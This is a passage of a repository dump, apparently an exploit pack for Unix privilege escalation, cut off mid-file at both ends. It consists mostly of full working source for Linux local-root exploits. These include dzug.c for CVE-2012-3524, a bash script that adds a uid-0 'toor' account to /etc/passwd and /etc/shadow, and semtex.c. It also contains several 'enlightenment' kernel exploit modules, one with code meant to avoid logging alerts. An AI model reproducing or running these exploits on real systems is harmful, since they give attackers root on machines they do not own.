(geteuid() == 0) { 73 | setuid(0); 74 | execve(*sh, sh, NULL); 75 | return errno; 76 | } 77 | 78 | printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n"); 79 | memset(me, 0, sizeof(me)); 80 | 81 | if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) { 82 | /* Solaris */ 83 | readlink("/proc/self/path/a.out", me, sizeof(me) - 1); 84 | } 85 | symlink(me, "/tmp/dbus-launch"); 86 | printf("[+] Type current user passwd when asked\n"); 87 | env[3] = "DISPLAY=:7350"; 88 | su[1] = getenv("USER"); 89 | a = su; 90 | 91 | if ((pid = fork()) == 0) { 92 | execve(*a, a, env); 93 | exit(0); 94 | } 95 | 96 | printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n"); 97 | 98 | for (i = 0; i < 10; ++i) { 99 | sleep(1); 100 | printf("."); fflush(stdout); 101 | } 102 | kill(pid, SIGKILL); 103 | waitpid(pid, NULL, 0); 104 | 105 | for (;;) { 106 | stat(*dbus, &st); 107 | if ((st.st_mode & 04755) == 04755) 108 | break; 109 | sleep(1); 110 | } 111 | printf("\n[!] Hurra!\n"); 112 | 113 | execve(*dbus, dbus, NULL); 114 | return errno; 115 | } -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dzug: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-3524/dzug -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dzug.c: -------------------------------------------------------------------------------- 1 | /* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer 2 | * 3 | * Trivial non-dbus root exploit. (Yes, it is 2012!) 4 | * 5 | * The underlying bug (insecure getenv() by default) has been 6 | * reported ages ago, but nobody really cared. Unless you have an 7 | * exploit... 
8 | * 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | 22 | int main(int argc, char **argv) 23 | { 24 | int i = 0; 25 | struct stat st; 26 | pid_t pid = 0; 27 | char *env[] = { 28 | "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin", 29 | "DBUS_STARTER_BUS_TYPE=system", 30 | "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:", 31 | NULL, 32 | NULL 33 | }; 34 | 35 | 36 | /* the pam_systemd vector */ 37 | char *su[] = {"/bin/su", NULL, "blah", NULL}; 38 | 39 | /* the spice vector */ 40 | char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL}; 41 | 42 | /* the Xorg vector, for older Linux dists and Solaris */ 43 | char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL}; 44 | 45 | char **a = xorg; 46 | char *dbus[] = {"/tmp/dbus-launch", NULL}; 47 | char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL}; 48 | char me[0x1000]; 49 | 50 | if (geteuid() == 0 && argc > 1) { 51 | chown("/tmp/dbus-launch", 0, 0); 52 | chmod("/tmp/dbus-launch", 04755); 53 | exit(errno); 54 | } else if (geteuid() == 0) { 55 | setuid(0); 56 | execve(*sh, sh, NULL); 57 | return errno; 58 | } 59 | 60 | printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n"); 61 | memset(me, 0, sizeof(me)); 62 | 63 | if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) { 64 | /* Solaris */ 65 | readlink("/proc/self/path/a.out", me, sizeof(me) - 1); 66 | } 67 | symlink(me, "/tmp/dbus-launch"); 68 | 69 | if (stat(spice[0], &st) == 0) { 70 | if ((st.st_mode & 04000) == 04000) { 71 | printf("[+] Using spice helper ...\n"); 72 | a = spice; 73 | } 74 | } else if (stat("/lib64/security/pam_systemd.so", &st) == 0) { 75 | printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n"); 76 | env[3] = "DISPLAY=:7350"; 77 | su[1] = getenv("USER"); 78 | a = su; 79 | } else if (stat(xorg[0], &st) == 0) { 80 | if ((st.st_mode & 04000) == 04000) 81 | printf("[+] Using Xorg helper 
...\n"); 82 | else { 83 | printf("[-] No suitable suid helper found.\n"); 84 | exit(0); 85 | } 86 | } else { 87 | printf("[-] No suitable suid helper found.\n"); 88 | exit(0); 89 | } 90 | 91 | if ((pid = fork()) == 0) { 92 | execve(*a, a, env); 93 | exit(0); 94 | } 95 | 96 | printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n"); 97 | 98 | for (i = 0; i < 10; ++i) { 99 | sleep(1); 100 | printf("."); fflush(stdout); 101 | } 102 | kill(pid, SIGKILL); 103 | waitpid(pid, NULL, 0); 104 | 105 | for (;;) { 106 | stat(*dbus, &st); 107 | if ((st.st_mode & 04755) == 04755) 108 | break; 109 | sleep(1); 110 | } 111 | printf("\n[!] Hurra!\n"); 112 | 113 | execve(*dbus, dbus, NULL); 114 | return errno; 115 | } 116 | 117 | -------------------------------------------------------------------------------- /2012/a.out: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Exploit Title: Ubuntu PAM MOTD local root 4 | # Date: July 9, 2010 5 | # Author: Anonymous 6 | # Software Link: http://packages.ubuntu.com/ 7 | # Version: pam-1.1.0 8 | # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) 9 | # CVE: CVE-2010-0832 10 | # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i 11 | # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen 12 | # 13 | # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. 14 | # Does not prompt for login by creating temporary SSH key and authorized_keys entry. 
15 | # 16 | # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh 17 | # [*] Ubuntu PAM MOTD local root 18 | # [*] Backuped /home/user/.ssh/authorized_keys 19 | # [*] SSH key set up 20 | # [*] Backuped /home/user/.cache 21 | # [*] spawn ssh 22 | # [+] owned: /etc/passwd 23 | # [*] spawn ssh 24 | # [+] owned: /etc/shadow 25 | # [*] Restored /home/user/.cache 26 | # [*] Restored /home/user/.ssh/authorized_keys 27 | # [*] SSH key removed 28 | # [+] Success! Use password toor to get root 29 | # Password: 30 | # root@ubuntu:/home/user# id 31 | # uid=0(root) gid=0(root) groupes=0(root) 32 | # 33 | P='toor:x:0:0:root:/root:/bin/bash' 34 | S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' 35 | echo "[*] Ubuntu PAM MOTD local root" 36 | [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 37 | [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 38 | [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 39 | backup() { 40 | [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak 41 | [ -e "$1" ] || return 0 42 | mv "$1"{,.bak} || return 1 43 | echo "[*] Backuped $1" 44 | } 45 | restore() { 46 | [ -e "$1" ] && rm -rf "$1" 47 | [ -e "$1".bak ] || return 0 48 | mv "$1"{.bak,} || return 1 49 | echo "[*] Restored $1" 50 | } 51 | key_create() { 52 | backup ~/.ssh/authorized_keys 53 | ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 54 | [ ! 
-d ~/.ssh ] && { mkdir ~/.ssh || return 1; } 55 | mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 56 | echo "[*] SSH key set up" 57 | } 58 | key_remove() { 59 | rm -f "$KEY" 60 | restore ~/.ssh/authorized_keys 61 | echo "[*] SSH key removed" 62 | } 63 | own() { 64 | [ -e ~/.cache ] && rm -rf ~/.cache 65 | ln -s "$1" ~/.cache || return 1 66 | echo "[*] spawn ssh" 67 | ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true 68 | [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } 69 | echo "[+] owned: $1" 70 | } 71 | bye() { 72 | key_remove 73 | exit 1 74 | } 75 | KEY="$(mktemp -u)" 76 | key_create || { echo "[-] Failed to setup SSH key"; exit 1; } 77 | backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } 78 | own /etc/passwd && echo "$P" >> /etc/passwd 79 | own /etc/shadow && echo "$S" >> /etc/shadow 80 | restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } 81 | key_remove 82 | echo "[+] Success! Use password toor to get root" 83 | su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ 84 | chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor -------------------------------------------------------------------------------- /2012/acid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/acid -------------------------------------------------------------------------------- /2012/exp1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/exp1 -------------------------------------------------------------------------------- /2012/exploit: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/exploit -------------------------------------------------------------------------------- /2012/full-nelson: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/full-nelson -------------------------------------------------------------------------------- /2012/gayros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/gayros -------------------------------------------------------------------------------- /2012/krad313: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/krad313 -------------------------------------------------------------------------------- /2012/local-root-exploit-gayros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/local-root-exploit-gayros -------------------------------------------------------------------------------- /2012/pwnkernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/pwnkernel -------------------------------------------------------------------------------- /2012/root1: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/root1 -------------------------------------------------------------------------------- /2012/runx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/runx -------------------------------------------------------------------------------- /2012/tivoli: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/tivoli -------------------------------------------------------------------------------- /2012/ubuntu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/ubuntu -------------------------------------------------------------------------------- /2012/vmsplice-local-root-exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/vmsplice-local-root-exploit -------------------------------------------------------------------------------- /2013/2.6.17.4_2013: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.17.4_2013 -------------------------------------------------------------------------------- /2013/2.6.18: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.18 -------------------------------------------------------------------------------- /2013/2.6.32-2013: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.32-2013 -------------------------------------------------------------------------------- /2013/2.6.32-46.1.BHsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.32-46.1.BHsmp -------------------------------------------------------------------------------- /2013/2.6.37 to 3.x.x/semtex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * linux 2.6.37-3.x.x x86_64, ~100 LOC 3 | * gcc-4.6 -O2 semtex.c && ./a.out 4 | * 2010 sd@fucksheep.org, salut! 5 | * 6 | * update may 2013: 7 | * seems like centos 2.6.32 backported the perf bug, lol. 8 | * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. 
9 | */ 10 | 11 | #define _GNU_SOURCE 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define BASE 0x380000000 23 | #define SIZE 0x010000000 24 | #define KSIZE 0x2000000 25 | #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) 26 | 27 | void fuck() { 28 | int i,j,k; 29 | uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; 30 | uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); 31 | uint64_t kbase = ((uint64_t)current)>>36; 32 | uint32_t *fixptr = (void*) AB(1); 33 | *fixptr = -1; 34 | 35 | for (i=0; i<4000; i+=4) { 36 | uint64_t *p = (void *)¤t[i]; 37 | uint32_t *t = (void*) p[0]; 38 | if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 39 | for (j=0; j<20; j++) { for (k = 0; k < 8; k++) 40 | if (((uint32_t*)uids)[k] != t[j+k]) goto next; 41 | for (i = 0; i < 8; i++) t[j+i] = 0; 42 | for (i = 0; i < 10; i++) t[j+9+i] = -1; 43 | return; 44 | next:; } 45 | } 46 | } 47 | 48 | void sheep(uint32_t off) { 49 | uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; 50 | int fd = syscall(298, buf, 0, -1, -1, 0); 51 | assert(!close(fd)); 52 | } 53 | 54 | 55 | int main() { 56 | uint64_t u,g,needle, kbase, *p; uint8_t *code; 57 | uint32_t *map, j = 5; 58 | int i; 59 | struct { 60 | uint16_t limit; 61 | uint64_t addr; 62 | } __attribute__((packed)) idt; 63 | assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); 64 | memset(map, 0, SIZE); 65 | sheep(-1); sheep(-2); 66 | for (i = 0; i < SIZE/4; i++) if (map[i]) { 67 | assert(map[i+1]); 68 | break; 69 | } 70 | assert(i 15 | 16 | #define JUMP 0x0000100000001000LL 17 | #define BASE 0x380000000 18 | #define SIZE 0x010000000 19 | #define KSIZE 0x2000000 20 | 21 | static long ugid; 22 | 23 | void patch_current() { 24 | int i,j,k; 25 | char *current = *(char**)(((long)&i) & (-8192)); 26 | long kbase = ((long)current)>>36; 27 | 28 | for (i=0; i<4000; i+=4) { 29 | long *p = (void *)¤t[i]; 30 | int *t = 
(void*) p[0]; 31 | if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 32 | for (j=0; j<20; j++) { 33 | for (k = 0; k < 8; k++) 34 | if (((int*)&ugid)[k%2] != t[j+k]) goto next; 35 | for (i = 0; i < 8; i++) t[j+i] = 0; 36 | for (i = 0; i < 10; i++) t[j+9+i] = -1; 37 | return; 38 | next:; } 39 | } 40 | } 41 | 42 | 43 | int main() 44 | { 45 | long u = getuid(); 46 | long g = getgid(); 47 | int i, f = socket(16,3,4); 48 | static int n[10] = {40,0x10014,0,0,45,-1}; 49 | 50 | assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1); 51 | 52 | setresuid(u,u,u); setresgid(g,g,g); 53 | ugid = (g<<32)|u; 54 | 55 | memcpy(1<<12, &patch_current, 1024); 56 | for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current; 57 | send(f, n, sizeof(n), 0); 58 | setuid(0); 59 | return execl("/bin/bash", "-sh", 0); 60 | } 61 | -------------------------------------------------------------------------------- /2013/3.8.9 and down/perf_swevent_init: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/3.8.9 and down/perf_swevent_init -------------------------------------------------------------------------------- /2013/enlightenment/exp_cheddarbay.c: -------------------------------------------------------------------------------- 1 | /* wunderbar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "exp_framework.h" 12 | 13 | struct exploit_state *exp_state; 14 | 15 | #define OFFSET_OF_FLAGS 0x8 16 | 17 | struct sock { 18 | char gibberish1[0x60]; 19 | char gibberish2[0xe0]; 20 | unsigned long gibberish3[0x50]; 21 | }; 22 | 23 | char *desc = "Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root"; 24 | char *cve = "CVE-2009-1897"; 25 | 26 | int prepare(unsigned char *buf) 27 | { 28 | struct sock *sk = (struct sock *)buf; 29 | struct pollfd 
pfd; 30 | unsigned long target_addr; 31 | int i; 32 | int fd; 33 | 34 | fd = open("/dev/net/tun", O_RDONLY); 35 | if (fd < 0) { 36 | fprintf(stdout, "Unable to open /dev/net/tun!\n"); 37 | return 0; 38 | } 39 | close(fd); 40 | fd = open("/dev/net/tun", O_RDWR); 41 | if (fd < 0) { 42 | fprintf(stdout, "Unable to open /dev/net/tun!\n"); 43 | return 0; 44 | } 45 | 46 | target_addr = exp_state->get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11); 47 | 48 | memset(sk->gibberish1, 0, sizeof(sk->gibberish1)); 49 | memset(sk->gibberish2, 0, sizeof(sk->gibberish2)); 50 | for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++) 51 | sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS; 52 | 53 | pfd.fd = fd; 54 | pfd.events = POLLIN | POLLOUT; 55 | poll(&pfd, 1, 0); 56 | 57 | close(fd); 58 | 59 | return EXECUTE_AT_NONZERO_OFFSET | 1; 60 | } 61 | 62 | int requires_null_page = 1; 63 | 64 | int requires_symbols_to_trigger = 1; 65 | 66 | int get_exploit_state_ptr(struct exploit_state *ptr) 67 | { 68 | exp_state = ptr; 69 | return 0; 70 | } 71 | 72 | int trigger(void) 73 | { 74 | int fd; 75 | fd = open("/dev/net/tun", O_RDONLY); 76 | if (fd < 0) 77 | return 0; 78 | mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); 79 | close(fd); 80 | 81 | return 1; 82 | } 83 | 84 | int post(void) 85 | { 86 | return RUN_ROOTSHELL; 87 | } 88 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_ingom0wnar.c: -------------------------------------------------------------------------------- 1 | /* Ingo m0wnar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "exp_framework.h" 10 | 11 | #undef __NR_perf_counter_open 12 | #ifdef __x86_64__ 13 | #define __NR_perf_counter_open 298 14 | //#define OFFSET_OF_IP 0x88 15 | #define BUF_SIZE 0x100 16 | #else 17 | #define __NR_perf_counter_open 336 18 | //#define OFFSET_OF_IP 0x5c 19 | #define BUF_SIZE 0x80 20 | #endif 21 | 22 | struct 
perf_counter_attr { 23 | unsigned int type; 24 | unsigned int size; 25 | }; 26 | 27 | struct exploit_state *exp_state; 28 | 29 | char *desc = "Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)"; 30 | char *cve = "CVE-2009-3234"; 31 | 32 | int get_exploit_state_ptr(struct exploit_state *ptr) 33 | { 34 | exp_state = ptr; 35 | return 0; 36 | } 37 | 38 | int requires_null_page = 0; 39 | 40 | 41 | static char *dirty_code; 42 | 43 | int prepare(unsigned char *ptr) 44 | { 45 | char *mem; 46 | int fd; 47 | 48 | fd = open("./suckit_selinux", O_CREAT | O_WRONLY, 0644); 49 | if (fd < 0) { 50 | printf("unable to create file\n"); 51 | exit(1); 52 | } 53 | 54 | mem = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 55 | if (mem == MAP_FAILED) { 56 | printf("unable to mmap\n"); 57 | unlink("./suckit_selinux"); 58 | exit(1); 59 | } 60 | mem[0] = '\xff'; 61 | mem[1] = '\x15'; 62 | *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 6 : (unsigned int)mem + 12; 63 | mem[6] = '\xff'; 64 | mem[7] = '\x25'; 65 | *(unsigned int *)&mem[8] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 
sizeof(unsigned long) : (unsigned int)mem + 16; 66 | *(unsigned long *)&mem[12] = (unsigned long)exp_state->own_the_kernel; 67 | *(unsigned long *)&mem[12 + sizeof(unsigned long)] = (unsigned long)exp_state->exit_kernel; 68 | write(fd, mem, 0x1000); 69 | close(fd); 70 | munmap(mem, 0x1000); 71 | 72 | fd = open("./suckit_selinux", O_RDONLY); 73 | if (fd < 0) { 74 | printf("unable to open file for reading\n"); 75 | unlink("./suckit_selinux"); 76 | exit(1); 77 | } 78 | dirty_code = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0); 79 | if (dirty_code == MAP_FAILED) { 80 | printf("unable to mmap\n"); 81 | exit(1); 82 | } 83 | 84 | unlink("./suckit_selinux"); 85 | 86 | return 0; 87 | } 88 | 89 | int trigger(void) 90 | { 91 | struct perf_counter_attr *ctr; 92 | int tid; 93 | int i; 94 | 95 | ctr = (struct perf_counter_attr *)calloc(1, 0x1000); 96 | if (ctr == NULL) { 97 | fprintf(stdout, "out of memory\n"); 98 | exit(1); 99 | } 100 | 101 | /* Ingo's 3 line backdoor, reminds me of wait4() */ 102 | //ctr->size = BUF_SIZE; 103 | //*(unsigned long *)((char *)ctr + OFFSET_OF_IP) = (unsigned long)dirty_code; 104 | //syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 105 | 106 | /* just in case it gets compiled differently... 
;) */ 107 | ctr->size = BUF_SIZE; 108 | for (i = 0x40; i < BUF_SIZE; i+= sizeof(unsigned long)) { 109 | if (!(i % (sizeof(unsigned long) * sizeof(unsigned long)))) 110 | continue; 111 | *(unsigned long *)((char *)ctr + i) = (unsigned long)dirty_code; 112 | } 113 | 114 | syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 115 | 116 | /* if we're successful, we won't get to this next line */ 117 | 118 | fprintf(stdout, "System is not vulnerable.\n"); 119 | exit(1); 120 | 121 | return 0; 122 | } 123 | 124 | int post(void) 125 | { 126 | return RUN_ROOTSHELL; 127 | } 128 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_paokara.c: -------------------------------------------------------------------------------- 1 | /* CVE-2009-2908 2 | Integrated into enlightenment upon Fotis Loukos' request 3 | Also ported to x64 4 | Original x86 exploit was written by Fotis Loukos: 5 | http://fotis.loukos.me/security/exploits/paokara.c 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #define __USE_GNU 12 | #include 13 | #include 14 | #include "exp_framework.h" 15 | 16 | struct exploit_state *exp_state; 17 | 18 | struct myinodeops { 19 | void *dontcare[17]; 20 | void *getxattr; 21 | }; 22 | 23 | char *desc = "Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root"; 24 | char *cve = "CVE-2009-2908"; 25 | 26 | int prepare(unsigned char *buf) 27 | { 28 | /* this gets placed at 0x1 because we overwrite the i_op with 0x1 29 | in our loop that sets the mutex count properly 30 | */ 31 | struct myinodeops *ops = (struct myinodeops *)(buf + 1); 32 | unsigned long *lbuf = (unsigned long *)buf; 33 | int i; 34 | 35 | /* make sure mutex count is 1, handle any configuration 36 | */ 37 | for (i = 0; i < 200; i++) 38 | lbuf[i] = 1; 39 | 40 | ops->getxattr = exp_state->own_the_kernel; 41 | 42 | return 0; 43 | } 44 | 45 | int requires_null_page = 1; 46 | 47 | int get_exploit_state_ptr(struct exploit_state *ptr) 48 | { 49 | exp_state = 
ptr; 50 | return 0; 51 | } 52 | 53 | int trigger(void) 54 | { 55 | char buf1[4096]; 56 | char buf2[4096]; 57 | int fd; 58 | char *path = getenv("XPL_PATH"); 59 | if (path == NULL) { 60 | fprintf(stdout, " [+] XPL_PATH environment variable not set. Defaulting to current directory.\n"); 61 | path = "."; 62 | } 63 | snprintf(buf1, sizeof(buf1), "%s/lala", path); 64 | snprintf(buf2, sizeof(buf2), "%s/koko", path); 65 | 66 | if (open(buf1, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600) < 0) { 67 | fprintf(stdout, "Failed to create %s\n", buf1); 68 | return 0; 69 | } 70 | link(buf1, buf2); 71 | unlink(buf1); 72 | if ((fd = open(buf2, O_RDWR | O_CREAT | O_NOFOLLOW, 0600)) < 0) { 73 | fprintf(stdout, "Failed to create %s\n", buf2); 74 | return 0; 75 | } 76 | unlink(buf2); 77 | write(fd, "kot!", 4); 78 | 79 | return 1; 80 | } 81 | 82 | int post(void) 83 | { 84 | return RUN_ROOTSHELL; 85 | } 86 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_powerglove.c: -------------------------------------------------------------------------------- 1 | /* powerglove */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "exp_framework.h" 8 | 9 | #undef __NR_perf_counter_open 10 | #ifdef __x86_64__ 11 | #define __NR_perf_counter_open 298 12 | #else 13 | #define __NR_perf_counter_open 336 14 | #endif 15 | 16 | struct perf_counter_attr { 17 | unsigned int type; 18 | unsigned int size; 19 | }; 20 | 21 | struct exploit_state *exp_state; 22 | 23 | char *desc = "Powerglove: Linux 2.6.31 perf_counter local root"; 24 | char *cve = "CVE-2009-3234"; 25 | 26 | int get_exploit_state_ptr(struct exploit_state *ptr) 27 | { 28 | exp_state = ptr; 29 | return 0; 30 | } 31 | 32 | int requires_null_page = 1; 33 | 34 | int prepare(unsigned char *ptr) 35 | { 36 | return EXIT_KERNEL_TO_NULL; 37 | } 38 | 39 | int trigger(void) 40 | { 41 | struct perf_counter_attr *ctr; 42 | 43 | ctr = (struct perf_counter_attr *)calloc(1, 0x1000); 
44 | if (ctr == NULL) { 45 | fprintf(stdout, "bleh\n"); 46 | exit(1); 47 | } 48 | 49 | #ifdef __x86_64__ 50 | ctr->size = 0xd0; 51 | #else 52 | ctr->size = 0x60; 53 | #endif 54 | 55 | syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 56 | 57 | return 0; 58 | } 59 | 60 | int post(void) 61 | { 62 | return RUN_ROOTSHELL; 63 | } 64 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_therebel.c: -------------------------------------------------------------------------------- 1 | /* the rebel */ 2 | #include 3 | #include 4 | #include 5 | #include "exp_framework.h" 6 | 7 | struct dst_entry { 8 | void *next; 9 | int refcnt; 10 | int use; 11 | void *child; 12 | void *dev; 13 | short error; 14 | short obsolete; 15 | int flags; 16 | unsigned long lastuse; 17 | unsigned long expires; 18 | unsigned short header_len; 19 | unsigned short trailer_len; 20 | unsigned int metrics[13]; 21 | /* need to have this here and empty to avoid problems with 22 | dst.path being used by dst_mtu */ 23 | void *path; 24 | unsigned long rate_last; 25 | unsigned long rate_tokens; 26 | /* things change from version to version past here, so let's do this: */ 27 | void *own_the_kernel[8]; 28 | }; 29 | 30 | struct exploit_state *exp_state; 31 | 32 | char *desc = "The Rebel: Linux < 2.6.19 udp_sendmsg() local root"; 33 | char *cve = "CVE-2009-2698"; 34 | 35 | int get_exploit_state_ptr(struct exploit_state *ptr) 36 | { 37 | exp_state = ptr; 38 | return 0; 39 | } 40 | 41 | int requires_null_page = 1; 42 | 43 | int prepare(unsigned char *ptr) 44 | { 45 | struct dst_entry *mem = (struct dst_entry *)ptr; 46 | int i; 47 | 48 | /* for stealthiness based on reversing, makes sure that frag_off 49 | is set in skb so that a printk isn't issued alerting to the 50 | exploit in the ip_select_ident path 51 | */ 52 | mem->metrics[1] = 0xfff0; 53 | /* the actual "output" function pointer called by dst_output */ 54 | for (i = 0; i < 10; i++) 55 | 
